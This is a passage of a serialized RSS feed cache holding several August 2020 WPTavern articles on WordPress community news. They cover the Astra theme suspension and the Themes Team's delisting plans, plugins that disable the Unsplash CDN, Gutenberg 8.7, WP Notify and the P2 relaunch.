to spend 5% of the company&rsquo;s resources toward open source development and to donate to future WordCamps.</p>\n\n\n\n<p>&ldquo;These last few days have been very emotional for me and the entire team,&rdquo; said Pawar. &ldquo;I have never been in such a stressful situation in my life. As you can imagine, I wrote many versions of this apology and just wasn&rsquo;t sure what was the best way to do it.&rdquo;</p>\n\n\n\n<p>For some people in the community, changing the post&rsquo;s content seemed suspicious. He had changed it around the same time the theme was reinstated on WordPress.org. However, the issue was likely the result of bad timing. Pawar was forthcoming about having written the original post and later removing parts of it.</p>\n\n\n\n<p>&ldquo;My initial apology did include the specifics of how we are planning to increase our commitment to WordPress, but after more thought, I felt it wasn&rsquo;t the right place to share that,&rdquo; he said. &ldquo;I don&rsquo;t want our contributions to be overshadowed or tied back to a rule violation. We still plan to honor our commitment, and we will release those details in a dedicated post.&rdquo;</p>\n\n\n\n<p>Pawar has no hard feelings for the Themes Team. For him, it has been a high-stress weekend that he will no doubt recover from. He is attempting to rectify the situation the best he can.</p>\n\n\n\n<p>&ldquo;I have a lot of respect for all members of Themes Team,&rdquo; he said. &ldquo;They work tirelessly to move the WordPress ecosystem forward. I 100% believe that guidelines must be enforced because it&rsquo;s the only way to ensure that WordPress keeps growing. As one of the most popular theme authors, it&rsquo;s our goal to lead by setting a good example and work together with the TRT to set better standards.&rdquo;</p>\n\n\n\n<h2>Long Term: Delisting Themes Instead of Suspending</h2>\n\n\n\n<img />\n\n\n\n<p class=\"has-drop-cap\">The Themes Team does not have a lot of options when it comes to punitive measures for guideline violations. In a large part, this is the result of limitations of the software in use. The team simply needs better tools.</p>\n\n\n\n<p>&ldquo;The punitive measures the team has right now is suspend it or do nothing,&rdquo; said William Patton, a Themes Team representative. &ldquo;There is no in-between, and in a lot of cases, neither of those two options are ideal. From past experience, I have found that asking authors repeatedly for changes is either ineffective or they fix it but the behavior returns after a short time. Suspension has been quite effective in some cases but it is quite a lot of work for the team to manage and maintain lists or time frames of what happened when and to revisit after a given time.&rdquo;</p>\n\n\n\n<p>Patton said that the threat of suspension without action is ineffective. However, actually going through with suspending a theme often has implications for end-users. In some cases, there may be an urgent security update that users need to get, but the suspension system does not make that easy to manage.</p>\n\n\n\n<p>There is now an <a href=\"https://meta.trac.wordpress.org/ticket/5362\">open meta ticket</a> to offer theme directory administrators the option to delist a theme. In effect, this would keep a theme such as Astra available in the directory if someone knows the direct URL. It would also allow the theme author to provide updates, such as security fixes, to users without direct approval from the Themes Team. However, the theme would not be available through the popular themes list or search.</p>\n\n\n\n<p>This offers the team a less drastic option than a full-on suspension and has no negative drawbacks for existing theme users.</p>\n\n\n\n<p>Currently, the team found what they described as a &ldquo;hacky&rdquo; method of essentially delisting Astra. Because the popular themes list algorithm uses the theme&rsquo;s publication date to help determine a theme&rsquo;s popularity, the team changed this date for the theme to push it down the popular list. It is not a perfect solution, but it provided a quick middle ground between doing nothing and suspension, at least until a more permanent solution is in place. It also gives them an early chance to test out the effects such a measure would have.</p>\n\n\n\n<p>Punitive measures have always been a struggle for the team. On the one hand, they do not like to suspend themes for wrongdoing, regardless of whether such wrongdoing was intentional. On the other, they must attempt to provide a fair playing field for all theme authors. Threats of punishment for guideline violations ring hollow if there is no follow-through. It is not an easy position, and team members can quickly become victims of harassment or unwanted private messages from theme developers and outsiders.</p>\n\n\n\n<p>&ldquo;We had several occasions where theme authors would &lsquo;follow us home&rsquo; with blame and different kinds of suggestions,&rdquo; said Nymark.</p>\n\n\n\n<p>One of the ways the Themes Team has been dealing with this is by using the relatively anonymous &ldquo;@trtmessenger&rdquo; account when suspending themes. This is the route the team took when handling the Astra theme suspension and followup decisions.</p>\n\n\n\n<p>The team has dealt with attacks toward individual members over the years on various decisions it has made. In many cases, the representative who delivered a particular decision, regardless of their personal role in it, bared the brunt of the negative feedback. Far too often, it was a case of shooting the messenger, and the current reps have found a workable solution for this issue.</p>\n\n\n\n<p>&ldquo;This is an account that enables messages to be sent without one single person being held accountable for the message,&rdquo; said Patton. &ldquo;It is intended to prevent anyone from getting any negative feedback directly from a decision.&rdquo;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Aug 2020 21:29:25 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"WPTavern: New WordPress Plugins Disable Unsplash CDN\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102767\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:149:\"https://wptavern.com/new-wordpress-plugins-disable-unsplash-cdn?utm_source=rss&utm_medium=rss&utm_campaign=new-wordpress-plugins-disable-unsplash-cdn\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:9548:\"<p>In light of the recent conversations about the Unsplash plugin&rsquo;s CDN, several extensions have popped up this week for disabling it. By default, the plugin serves images from the CDN but saves copies to the WordPress media library in case the plugin is disabled or removed. The plugin does not currently have an option to change this.</p>\n\n\n\n<p><a href=\"https://wordpress.org/plugins/disable-unsplash-cdn/\">Disable Unsplash CDN</a> is the first to be published to the WordPress.org directory for changing the plugin&rsquo;s default behavior. There are no options or settings &ndash; activating it turns it on. Xaver Birsak, a prolific WordPress plugin author, created it to help users who may experience slower page speed caused by the Unsplash CDN.</p>\n\n\n\n<p>&ldquo;I&rsquo;ve followed the release of the official Unsplash plugin as well the strange one-star rating from Matt Mullenweg which is think is not appropriate,&rdquo; Birsak said. &ldquo;The problem he mentioned was, in addition to the Unsplash license, the fact that images are being served from Unsplash (Imgix) servers. I don&rsquo;t think that this is totally unnecessary from Unsplash as a CDN can serve images much quicker in most cases. For some users this is maybe not the case.&rdquo;</p>\n\n\n\n<p>Birsak was referencing Matt Mullenweg&rsquo;s recent <a href=\"https://wordpress.org/support/topic/i-wouldnt-recommend-using-this/\">one-star review</a> of the Unsplash plugin, which drew the ire of many plugin developers whose ability to monetize their products can hinge on getting decent reviews. The review called the plugin &ldquo;sketchy&rdquo; and called into question the practice of making the CDN the default:</p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>It&rsquo;s unclear why they want you to use their CDN and make that the default, it&rsquo;s probably to support their&nbsp;<a href=\"https://unsplash.com/blog/introducing-unsplash-for-brands/\">new advertising business model</a>&nbsp;and get analytics for it. Running a CDN is expensive, and if you&rsquo;re not paying for it then you are the product. I would not be surprised if Unsplash hotlinked images broke at some point in the future.</p><p>If you want a CDN, you should run one for your entire site, not just certain images from a single source &mdash; in fact having multiple CDNs running at the same time could slow down your site because of the additional DNS lookups.</p></blockquote>\n\n\n\n<p>Birsak said he checked the plugin and found a simple solution for bypassing the hotlinking, which only requires a few lines of code. </p>\n\n\n\n<p>&ldquo;Since it&rsquo;s so easy, and others may find it useful, I released this plugin,&rdquo; Birsak said. &ldquo;Nowadays with GDPR and the invalidation of the Privacy Shield people are more likely to be concerned about sending data to third party services. So disabling the CDN should at least be an option.&rdquo;</p>\n\n\n\n<p>WordPress developer <a href=\"https://tomjn.com/\">Tom Nowell</a> also created a quick plugin to disable Unsplash&rsquo;s CDN, which is now <a href=\"https://gist.github.com/tomjn/a7036d369d6f8082dd1eb256c651696e\">available on GitHub</a>.</p>\n\n\n\n<p>&ldquo;I don&rsquo;t have qualms with Unsplash themselves but I did miss having the option to choose for myself,&rdquo; Nowell said regarding the plugin&rsquo;s CDN default. &ldquo;Rather than argue to add it, I spent a little time and built the plugin, it&rsquo;s only small so didn&rsquo;t take much time. As for the CDN, it&rsquo;s nice to save bandwidth, though for local development it&rsquo;s always faster to switch it off.&rdquo;</p>\n\n\n\n<h2>Unsplash Plugin Will Not Add an Option to Disable the CDN &ndash; Its API Guidelines Require Apps to Use It</h2>\n\n\n\n<p>The plugins that disable Unsplash&rsquo;s CDN could immediately become obsolete if Unsplash decided to build in an option into the official plugin to do the same. The company has confirmed the team has no current plans to so. </p>\n\n\n\n<p>&ldquo;The CDN is a feature that dynamically serves the right size and format of image, and includes performance optimizations not available via additional plugins like WordPress.com&rsquo;s Jetpack or most CDNs,&rdquo; Unsplash co-founder Luke Chesser said. &ldquo;We do this to improve the performance of the image loading and allow Unsplash contributors to count the number of times their images have been seen.&rdquo;</p>\n\n\n\n<p>In addition to sharing this data with contributing photographers, Unsplash advertisers also need this data to continue getting value from the new <a href=\"https://unsplash.com/blog/introducing-unsplash-for-brands/\">Unsplash for Brands</a> business model. </p>\n\n\n\n<p>The total monthly cost in 2019 for the company&rsquo;s image hosting with <a rel=\"noreferrer noopener\" href=\"https://imgix.com/\" target=\"_blank\">Imgix</a> was <a href=\"https://medium.com/unsplash/what-does-unsplash-cost-in-2019-f499620a14d0\">$42,408</a>, which means Unsplash spends north of $500k per year to serve optimized images via its CDN. Chesser said the cost of the CDN is &ldquo;very low relative to the number of requests and traffic it can serve,&rdquo; given how optimized and performant the image serving infrastructure is. Last year Unsplash sent petabytes of data through Imgix&rsquo;s CDN for 250 million variations of the library&rsquo;s source images.</p>\n\n\n\n<p>&ldquo;We treat brands as contributors as they also share images on Unsplash,&rdquo; Chesser said. &ldquo;We report downloads and views back to them. So yes, the view and download counts do matter to our business from a monetary perspective, but to be clear, if you take away brands, we would still have this requirement as it&rsquo;s central to growing the library and encouraging more contributors.&rdquo;</p>\n\n\n\n<p>Providing stats to brands undoubtedly helps pay the bills and keeps the lights on, so it is no wonder the requirement to use the CDN will remain in the WordPress plugin. In fact, this requirement was built into <a href=\"https://help.unsplash.com/en/articles/2511245-unsplash-api-guidelines\">Unsplash&rsquo;s API guidelines</a> in 2018 and applies to all applications accessing the collection:</p>\n\n\n\n<p>&ldquo;<em>All API uses must use the hotlinked image URLs returned by the API under the <code>photo.urls</code> &nbsp;properties. This applies to all uses of the image and not just search results. &ldquo;</em></p>\n\n\n\n<p>In 2019, Unsplash received more traffic from its API partners than from the company&rsquo;s own website and official apps. Any successful monetization strategy that hinges on advertising will need to deliver those stats and requiring applications use the CDN in order to use the API is one way to do that. </p>\n\n\n\n<p>Matt Mullenweg recently <a href=\"https://twitter.com/photomatt/status/1290739168537001984\">asked</a> what these API guidelines mean for existing WordPress plugins, like <a href=\"https://wordpress.org/plugins/instant-images/\">Instant Images</a>, that serve Unsplash images without using the CDN. The plugin has more than 50,000 active installations. </p>\n\n\n\n<p>&ldquo;When we released the updated guidelines we applied them proactively to new apps and worked with developers on a case by case basis over a one year period to consider hotlinking and downloads for legacy apps,&rdquo; Chesser said. &ldquo;Instant Images was built before we made the update to the guidelines and so we exempted them long ago, along with&nbsp;a number of other legacy apps.&rdquo;</p>\n\n\n\n<p>Instant Images plugin developer Darren Cooney said he will not be adding an option to his plugin for turning on the CDN and declined to comment further on his reasons. </p>\n\n\n\n<p>&ldquo;I will say that I think the CDN should be opt-in and it should be more clear what happens on the Unsplash side when the CDN is in use,&rdquo; Cooney said. &ldquo;What is tracked, why it&rsquo;s tracked and what benefit do added views provide the contributors.&rdquo;</p>\n\n\n\n<p> When asked whether Unsplash plans to update the plugin to deny API access to sites that have added a plugin to disable the CDN, Chesser said no. WordPress plugins weaponizing themselves against each other is not unheard of, although it is unusual and frowned upon.</p>\n\n\n\n<p>&ldquo;We don&rsquo;t do things like that,&rdquo; Chesser said. &ldquo;I think anyone who knows our team and our community will know that we always try to take reasonable actions as we&rsquo;re representing a lot of contributors and a large community. If a user wants to install a plugin to deactivate the CDN but still access the library, they can do that by all means, but we don&rsquo;t want to build, promote, and support that functionality ourselves because it works against our community,&nbsp;our business, and our mission.&rdquo;</p>\n\n\n\n<p>The bottom line is Unsplash is a business, and a business needs to make money. Certainly a company doesn&rsquo;t commission a WordPress plugin from a team of the caliber of <a href=\"https://xwp.co/\">XWP</a> without hoping for a return on that kind of investment. The plugin&rsquo;s setup process makes it effortless for users to connect to the Unsplash API, but there isn&rsquo;t any transparency during this process regarding what data users are agreeing to send Unsplash. The plugin needs to be more forthcoming about the data the CDN collects on views and downloads. This would go a long way towards establishing more credibility with skeptics. Those who are wary of the requirement to use the CDN can use a plugin to disable it or install an alternative like Instant Images. </p>\n\n\n\n<p></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Aug 2020 21:45:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:111:\"WPTavern: Gutenberg 8.7 Adds Minor Changes, Updates Block Pattern Designs, and Continues Full-Site Editing Work\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102950\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:263:\"https://wptavern.com/gutenberg-8-7-adds-minor-changes-updates-block-pattern-designs-and-continues-full-site-editing-work?utm_source=rss&utm_medium=rss&utm_campaign=gutenberg-8-7-adds-minor-changes-updates-block-pattern-designs-and-continues-full-site-editing-work\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5390:\"<p class=\"has-drop-cap\">On Wednesday, the Gutenberg team pushed what was primarily <a href=\"https://make.wordpress.org/core/2020/08/05/whats-new-in-gutenberg-august-5/\">minor enhancements and bug fixes</a> to the WordPress platform&rsquo;s primary project. Everyone is mostly gearing up for the WordPress 5.5 release, so we are not seeing any major features dropping at the moment. However, steady work continues on improving the Gutenberg plugin.</p>\n\n\n\n<p>Gutenberg 8.7 contains over 30 bug fixes, in which nearly a third were accessibility-related changes. Around half of the new enhancements focused on updating block patterns.</p>\n\n\n\n<p>Users can look forward to several minor enhancements that should improve the editor, such as the Buttons block getting a proper <a href=\"https://github.com/WordPress/gutenberg/pull/24249\">preview in the inserter</a>. The monitoring solution behind auto-saving should also <a href=\"https://github.com/WordPress/gutenberg/pull/23962\">work more consistently</a> with this update.</p>\n\n\n\n<p>The biggest user-facing enhancement is the change in <a href=\"https://github.com/WordPress/gutenberg/pull/24263\">dealing with invalid blocks</a>. The latest version of the plugin makes the <em>attempt block recovery</em> option the default. This change hides the <em>resolve</em>, <em>convert to classic</em>, and <em>convert to HTML</em> options under the sub-menu (ellipsis button). This is a nice touch and makes the most sense. Attempting to recover a block should generally be the first step when correcting invalid block output.</p>\n\n\n\n<h2>Block Pattern Updates</h2>\n\n\n\n<ul><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li><li class=\"blocks-gallery-item\"><img /></li></ul>Updated block pattern designs.\n\n\n\n<p class=\"has-drop-cap\">I can now proceed to eat my earlier words of <a href=\"https://wptavern.com/decision-time-what-block-patterns-should-ship-with-wordpress-5-5\">frustration with block patterns</a>. Or, perhaps I can praise myself in some small way for pushing the Gutenberg team to up their game. I was unhappy with the abysmal designs that were originally going to ship with WordPress 5.5. The team has taken what was looking to be one of the most disappointing first outings for a feature and turned it into something the project can be proud of.</p>\n\n\n\n<p>It did not take much. A photo here. A touch of pizazz there. The Don Quixote images and text bring a cohesive theme to the patterns, breathing a touch of life in an otherwise desolate and barren feature.</p>\n\n\n\n<p>The &ldquo;large header with a heading&rdquo; pattern <a href=\"https://github.com/WordPress/gutenberg/pull/24141\">dropped the blinding background</a> gradient and replaced it with an image. The &ldquo;quote&rdquo; pattern <a href=\"https://github.com/WordPress/gutenberg/pull/24140\">now has a face</a> instead of an impersonal icon. Even the &ldquo;two images side by side&rdquo; pattern <a href=\"https://github.com/WordPress/gutenberg/pull/24139\">fits in thematically</a>.</p>\n\n\n\n<p>If anything, I am not a fan of the long pattern names. &ldquo;Large header with a heading and a button&rdquo; and &ldquo;three columns of text with buttons&rdquo; do not exactly roll off the tongue. Nor do they make it easy to write about them. I do not wish the pain of typing them out on any support volunteers.</p>\n\n\n\n<p>At least we are working with a somewhat decent set of patterns going forward, and that is enough to be thankful for at this point. I will now await the first theme author to truly impress me with custom patterns.</p>\n\n\n\n<h2>Experimental Features Update</h2>\n\n\n\n<img />Site editor beta.\n\n\n\n<p class=\"has-drop-cap\">Much of the work for this release centered on the plugin&rsquo;s experimental features. The bulk of it went toward post-related blocks. At this point, these features are so experimental that even experienced developers outside of the inner Gutenberg circle have trouble following the progress. It is nice to see the continual movement in this area. However, from a user viewpoint, it is not even ready for a quick look. Enable at your own risk. Wait until the product is a bit more polished.</p>\n\n\n\n<p>I typically enable Gutenberg&rsquo;s experimental features once a month or so. I want to keep up with the progress and not feel out of the loop. Such was the case over the past couple of days as I tinkered a bit more with the full-site editing and demo templates features. I am unsure what I was hoping for. Mostly, I wanted some indication of a bright future &mdash; one that I fully expect to be realized at some point. I wanted to be wowed.</p>\n\n\n\n<p>I understand why the <em>wow</em> factor is not there. The feature is far from ready. More than that, I know that, as a developer, you have a vision of the finished product in your head, and as the UI is in flux, others cannot see that vision. It is a step-by-step process that you simply have to continue working through.</p>\n\n\n\n<p>I am still of the belief that full-site editing will not be close to a viable feature until 2021. Even with all hands on deck, four months is too small of a window to make anything remotely competitive to existing solutions out there. When full-site editing does land in core WordPress, it needs to do so with a bang, not a whimper.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Aug 2020 21:33:21 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: Is WP Notify the Silver Bullet WordPress Needs to End Admin Notification Spam?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102877\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:219:\"https://wptavern.com/is-wp-notify-the-silver-bullet-wordpress-needs-to-end-admin-notification-spam?utm_source=rss&utm_medium=rss&utm_campaign=is-wp-notify-the-silver-bullet-wordpress-needs-to-end-admin-notification-spam\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5192:\"<p>A short while ago, Justin Tadlock posted an article titled <a rel=\"noreferrer noopener\" href=\"https://wptavern.com/are-plugin-authors-to-blame-for-the-poor-admin-notices-experience\" target=\"_blank\">Are Plugin Authors to Blame for the Poor Admin Notices Experience?</a>. If you haven&rsquo;t already, I recommend reading his article. It describes in detail one question I&rsquo;ve been pondering since I originally posted the <a href=\"https://make.wordpress.org/core/2019/08/05/feature-project-proposal-wp-notify/\">WP Notify feature project proposal</a> almost a year ago now: Will a new notification system for WordPress solve the notification spam, or just move it elsewhere?</p>\n\n\n\n<p>The answer might not be as simple as we think.</p>\n\n\n\n<p>I have been building, maintaining, and supporting a number of free, paid, and client plugins for the past five years. During that time I have also been an active contributor &mdash; as much as I possibly can outside of work and my personal life &mdash; to the WordPress open source project. Now that&rsquo;s definitely a drop in the ocean compared to some folks, but whenever I see the mess that can occur when multiple plugins or themes register admin_notices on EVERY SINGLE ADMIN PAGE, it strengthens my resolve in the idea that WordPress needs a centrally managed notification system.&nbsp;</p>\n\n\n\n<p>If you read Justin&rsquo;s article, or you are a plugin or theme developer yourself, you know that the notifications system (aka admin notices, a reference to the WordPress <a rel=\"noreferrer noopener\" href=\"https://developer.wordpress.org/reference/hooks/admin_notices/\" target=\"_blank\">hook that prints these notices</a>) in WordPress is limited at best. We need to be honest with ourselves, however, admin notices was not designed to function as a notification system. Admin notices should really only be used to display useful information to the user about state changes in the system. Messages like when a post has been updated or deleted, or a database upgrade is required. Short, useful, and more importantly, relevant.</p>\n\n\n\n<p>As developers, we usually look for the root cause of a problem. And in the case of admin notices, the root cause is not the current notification system, or the fact that plugin developers use it for things other than, well, admin notices. The root cause is the fact that there has never existed a mechanism for notifications other than admin notices to be displayed to the user. This means that whenever a plugin developer has needed, or in fact wanted, to communicate with their users, via &ldquo;in app messages,&rdquo; admin notices has been the only way they can do so.</p>\n\n\n\n<p>Want to let your users know about a new upgrade? Admin notice. Want to ask them to leave a review? Admin notice. Your premium license is about to expire! Admin notice. Hey, we&rsquo;ve got a new sale on our premium products! Admin notice. It all soon adds up to an almighty mess.</p>\n\n\n\n<p>And that&rsquo;s the problem with a project like WP Notify. We&rsquo;ve had admin notices, in its current iteration at least, since 2011. That means we have been using it for all our user facing messages now for nine years at least &ndash; nine years of plugin and theme developers using admin notices to send messages to users.&nbsp;</p>\n\n\n\n<p>If you have children, imagine telling your nine year old that the way they have been walking is wrong, and they now need to learn a completely new way of doing it. Good Luck!</p>\n\n\n\n<p>So, as much as it pains me to admit it, WP Notify is not the silver bullet that will magically fix the problem at its core. As Matt Mullenweg pointed out in the comments on Justin&rsquo;s article, &ldquo;I don&rsquo;t think a notification center is the solution to this problem. It may be useful for other reasons, but not that one.&rdquo;</p>\n\n\n\n<p>However, not having a specific solution for notifications other than those that are necessary, means that developers will keep on doing things the way they have always been. Enforcing new guidelines around the current functionality nine years later is going to be hard, especially since enforcing these guidelines will have to be done by a small group of volunteers, namely the theme and plugin review teams.&nbsp;</p>\n\n\n\n<p>By building WP Notify, we create a new and hopefully better way for plugin and theme developers to connect and communicate with their users. At the same time, we provide a tool by which we can more easily enforce any new guidelines. A guideline could be created for example, that unless your message is strictly within the realms of informing the user about state changes in the system, it needs to be displayed in the notifications center, and not as an admin notice.</p>\n\n\n\n<p>So no, I don&rsquo;t believe WP Notify will be a silver bullet solution. We&rsquo;re not going to build it, ship it, and suddenly all the notification spam goes away the next day. That kind of change takes time.</p>\n\n\n\n<p>But I do believe it&rsquo;s a step in the right direction.</p>\n\n\n\n<p>If you agree with me, why not <a href=\"https://make.wordpress.org/core/tag/feature-notifications/\">join our merry band and help us build it</a>.&nbsp;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Aug 2020 14:06:20 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Jonathan Bossenger\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Automattic Relaunches P2, Self-Hosted Version on the Roadmap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102891\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:183:\"https://wptavern.com/automattic-relaunches-p2-self-hosted-version-on-the-roadmap?utm_source=rss&utm_medium=rss&utm_campaign=automattic-relaunches-p2-self-hosted-version-on-the-roadmap\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4890:\"<p>Automattic&rsquo;s relaunch of P2 is <a href=\"https://wordpress.com/p2/\">now in Beta</a>. This is the long-awaited update to the company&rsquo;s internal collaboration software that is also used on WordPress.org and other self-hosted sites via a theme. For years, Automattic, which now counts more than 1,200 employees in 77 countries, has had P2 at the core of its written communication tools. It is used as a complement to Slack and video conferencing, providing a public collaboration space for conversations which might otherwise be hidden away in emails. </p>\n\n\n\n<p>The older version of P2 functioned as a dependable workhorse with few changes over the years, but the beta introduces some marked improvements that make it more versatile than before. It is now seamlessly integrated with the block editor and includes a streamlined invitation system for onboarding new team members.</p>\n\n\n\n<img />\n\n\n\n<p>P2 has a fresh design that has come a long way since its roots as an <a href=\"https://ma.tt/2009/05/how-p2-changed-automattic/\">evolution of the Prologue microblogging theme.</a> Many things about WordPress have changed since P2&rsquo;s first launch 11 years ago but threaded conversations have endured as a useful collaboration format. Mobile support is one of the things that has improved significantly. Users can get notifications via the web, email, and the WordPress mobile apps.</p>\n\n\n\n<img />\n\n\n\n<p>&ldquo;It works on the WordPress apps perfectly but it&rsquo;s handled as a normal WordPress site, without any P2 specific functionality,&rdquo; Automattic&rsquo;s P2 launch lead Jon Burke said. &ldquo;P2 specific functionality and improvements are on the mobile app product roadmap. The browser version on the other hand has all the particularities that P2 has.&rdquo;</p>\n\n\n\n<p>The beta version of P2 is free and each instance comes with 3GB of storage space for images and files. Users can create as many as they like. The product is built on top of WordPress.com&rsquo;s infrastructure but functions as a scaled back version of a blog &ndash; essentially a WordPress for teams. </p>\n\n\n\n<p>Pricing for the commercial upgrade has not yet been determined, according to Burke, but the roadmap includes a hefty list of features.</p>\n\n\n\n<p>&ldquo;We&rsquo;ll have integrations with third party services, project management features, more storage space, custom URLs, more customization options, etc,&rdquo; Burke said. &ldquo;We plan to introduce multi-site functionality, too, so an organization can create multiple P2s while sharing the same user base, have cross-posting, a common glossary, and other advanced features.&rdquo;</p>\n\n\n\n<p>With the diverse myriad of blocks pouring into the WordPress 